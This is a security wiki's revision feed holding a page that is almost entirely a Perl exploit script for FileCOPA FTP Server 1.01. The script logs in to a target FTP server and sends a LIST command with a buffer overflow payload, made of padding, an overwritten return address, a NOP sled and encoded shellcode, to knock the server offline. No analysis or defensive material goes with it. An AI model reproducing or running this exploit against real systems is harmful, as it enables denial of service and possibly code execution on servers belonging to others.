https://pwnwiki.com/index.php?action=history&feed=atom&title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E%2Fen
FileCOPA FTP Server 1.01 拒絕服務漏洞/en - Revision history
2026-04-16T20:39:36Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/en&diff=5857&oldid=prev
Pwnwiki: Created page with "==Affected Versions=="
2021-06-24T04:16:44Z
<p>Created page with "==Affected Versions=="</p>
<p><b>New page</b></p><div><languages /><br />
==Affected Versions==<br />
FileCOPA FTP Server 1.01<br />
<br />
==EXP==<br />
<pre><br />
#!/usr/bin/perl<br />
#<br />
# e-mail: fernando.mengalli@gmail.com<br />
#<br />
# Date: 04/06/2021<br />
#<br />
# Version Vulnerable: FileCOPA FTP Server 1.01<br />
#<br />
# OS Tested: Windows XP PACK 3 Brazilian e Windows 2000<br />
#<br />
# Youtube video: https://youtu.be/A9cEoyY9Bd4<br />
#<br />
# badchars \0x00\0x0a<br />
<br />
<br />
use Net::FTP;<br />
use Term::ANSIColor;<br />
<br />
<br />
$sis="$^O";<br />
print $sis;<br />
<br />
if ($sis eq "windows"){<br />
$cmd="cls";<br />
} else {<br />
$cmd="clear";<br />
}<br />
<br />
system("$cmd");<br />
<br />
if ((!$ARGV[0]) || (!$ARGV[1])) {<br />
<br />
&apresentacao();<br />
<br />
}<br />
<br />
sub apresentacao {<br />
<br />
print q {<br />
######################################################<br />
# #<br />
# [*] FileCOPA FTP Server 1.01 - Denied of Service #<br />
# #<br />
# [*] Author: Fernando Mengali #<br />
# #<br />
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #<br />
# #<br />
################# Code Exploit #######################<br />
<br />
<br />
<br />
}<br />
}<br />
<br />
<br />
our $alvo = $ARGV[0];<br />
our $porta = $ARGV[1];<br />
<br />
if (!$ARGV[0] && !$ARGV[1]) {<br />
exit;<br />
}<br />
<br />
<br />
if($alvo !~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) {<br />
print color('red bold');<br />
print " \n\n [-] Por favor, defina o IP alvo! \n\n";<br />
color('reset');<br />
exit;<br />
}<br />
<br />
if($porta < 0 || $porta > 65535) {<br />
print color('red bold');<br />
print " \n\n [-] Por favor, defina uma porta de 1 a 65535! \n\n";<br />
color('reset');<br />
exit;<br />
}<br />
<br />
print color('green bold');<br />
print "\n\nAlvo definido =>" .$alvo . " \n \n";<br />
print "Porta definida =>" .$porta . "\n\n";<br />
color('reset');<br />
<br />
print color('yellow bold');<br />
print "[+] Por favor, informe a nome de usuário: ";<br />
color('reset');<br />
print color('red bold');<br />
my $usuario = <stdin>;<br />
chomp($usuario);<br />
color('reset');<br />
<br />
print color('yellow bold');<br />
print "[*] Por favor, informe a senha de acesso: ";<br />
color('reset');<br />
print color('red bold');<br />
my $senha = <stdin>;<br />
chomp($senha);<br />
color('reset');<br />
<br />
my $buf =<br />
"\xba\x17\x61\x66\xaf\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b\xc9" .<br />
"\xb1\x60\x31\x55\x12\x83\xed\xfc\x03\x42\x6f\x84\x5a\xb7" .<br />
"\xa9\xf0\x15\x7b\xd9\xfb\x8f\xf7\x01\x08\x75\xdc\x80\x41" .<br />
"\xd3\x13\x51\xba\xe7\x11\x4d\x39\x25\x21\xb3\x27\x8b\x30" .<br />
"\xef\xf1\xac\xbd\x95\xe9\xcf\x1a\x1d\xb9\xe1\xf6\x27\x0b" .<br />
"\xff\x02\x98\xc0\xf6\xc7\x19\x52\xc4\x94\x18\xdb\x56\x20" .<br />
"\xb6\x9a\xc4\xb5\xec\xf3\x40\xd4\x19\x17\x6d\x35\x50\x3a" .<br />
"\x13\xc3\xb3\xf0\x38\x8d\xff\xc5\x05\x55\x33\xe7\xd2\x9e" .<br />
"\xb6\x8c\x9b\x79\xce\x8f\xd6\x30\x72\x12\x62\x26\x3e\xed" .<br />
"\xef\xda\x23\x88\x07\x74\xdc\xbe\xe1\xc4\x3e\x91\x8a\x26" .<br />
"\x3a\x3f\x2b\xf2\xe5\x3a\x18\x0f\xd0\x8d\x7b\xba\xf3\xba" .<br />
"\x2b\x5b\xa5\x2d\x54\xaa\x88\x68\x4b\xf4\xcc\x24\x68\xc1" .<br />
"\x19\x22\xf9\x08\xd6\x08\x8f\x4a\xe0\x7d\x67\xc1\x4e\xd8" .<br />
"\x08\x34\x44\x2b\x6a\x6f\x41\x6d\x53\x26\x73\x9d\xb4\xca" .<br />
"\x87\xed\xe6\x2d\x8b\x1c\x42\x0e\xb3\x20\xd0\xa1\x48\x97" .<br />
"\x45\x46\x26\x6b\xe7\x74\x52\xc1\xae\x2d\x8d\x1a\x06\xe0" .<br />
"\x24\x26\xbe\xfe\x26\xf8\x48\x75\x73\x5d\x6c\x67\xeb\xf4" .<br />
"\xf4\x08\x91\xf8\x5f\x4a\x3a\xd4\x5c\xd4\x7c\x52\x13\xa5" .<br />
"\x08\x06\xc9\x8b\x04\x9a\x0f\xe5\xe8\x1f\xef\x28\x3b\xe9" .<br />
"\x6e\xf9\xee\x7e\xf0\x5c\x5e\x4f\x95\x49\x0f\x83\xf0\x70" .<br />
"\x09\xf6\x83\xe9\x43\xb8\xe0\x88\x51\x6e\x9c\x5d\x48\x5b" .<br />
"\x9b\xca\x9a\xf1\x48\xa8\x51\x22\x61\x12\x55\xfe\x10\x16" .<br />
"\xb5\x42\x42\xff\x15\x14\x3f\x44\x9b\x92\xfc\xd9\x67\xe0" .<br />
"\x15\xd1\x64\xce\x75\xec\xa3\x08\x03\x61\x4a\x3b\x0e\x5a" .<br />
"\xb0\x7b\xe6\x2c\xac\xae\x5d\xad\x71\xf5\xb8\xc4\x4f\xd3" .<br />
"\xf4\x40\x2b\x92\x75\x83\xe3\x0f\x4c\x23\x78\x72\x0f\x22" .<br />
"\xb9\x10\xa6\x1d\xc9\xcb\xca\xe5\x61\xf8\x5f\x64\x86\x49" .<br />
"\x5b\xb2\x9e\x75\x30\xc6\x6e\x3c\x9a\x02\xad\x03\x36\x29" .<br />
"\xaf\x84\x62\x98\x22\xcd\xbf\x7e\xa2\x14\x97\x75\xa2\xc3" .<br />
"\xab";<br />
<br />
$offset = "\x41"x320;<br />
$NOPS= "\x90"x3105;<br />
$JMP = "\xe9\xbf\x2c\xb0\xff"; # jmp para endereco de memória<br />
$EIP= "\x93\x79\x2e\x7c"; # Aqui o jmp na biblioteca ADVAPI32.dll<br />
<br />
<br />
$payload = $offset . $EIP . $NOPS . $JMP . $buf . "\r\n";<br />
<br />
print color('cyan');<br />
print "\n\n[+] Conectando para o servidor " . $alvo . ":" . $porta."... \n";<br />
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die<br />
color('red')."\n[-] Não foi possível conectar. \n";<br />
sleep(2);<br />
print "[+] Conectado!\n";<br />
sleep(2);<br />
$ftp->login($usuario,$senha) || die color('red')."\n [-] Não pode conectar<br />
ou você derrubou: $!";<br />
print "[+] Autenticando...\n";<br />
sleep(2);<br />
print "[+] Autenticado com sucesso!\n\n";<br />
sleep(2);<br />
print "[*] Sobrecarregando o servidor...\n\n";<br />
sleep(2);<br />
$ftp->command("LIST A", $payload);<br />
color('reset');<br />
print color('green bold');<br />
print "[+] Servidor fora do ar!\n";<br />
color('reset');<br />
exit(0);<br />
</pre></div>
Pwnwiki